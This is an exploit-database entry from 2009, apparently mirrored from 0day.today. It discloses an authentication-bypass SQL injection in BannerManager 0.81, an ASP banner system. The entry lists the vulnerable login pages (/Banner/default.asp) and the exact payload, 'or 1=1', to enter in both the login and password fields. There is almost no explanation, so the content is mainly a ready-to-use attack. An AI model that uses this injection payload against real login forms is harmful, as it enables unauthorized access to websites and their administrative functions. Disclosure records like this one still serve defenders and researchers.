id: 4892
date: 02/26/2009
title: BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability
author: rootzig
cves: 

============================================================
BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability
============================================================


#################################################
#                                               #
# SISTEMA DE BANNER: BannerManager v0.81        #
# http://sourceforge.net/projects/bannermanager #
# --------------------------------------        # 
# vulnerable: sql injection :)                  #     
# Found by: rootzig                             #
# --------------------------------------        #
#################################################
                      Greetz: Eviwrite :P
                      -------------------
-----------------------------------------

/Banner/default.asp
/[patch]/default.asp

-----------------------------------------

Login: or 1=1 
Pass : or 1=1
        
-----------------------------------------



#  0day.today [2023-03-25]  #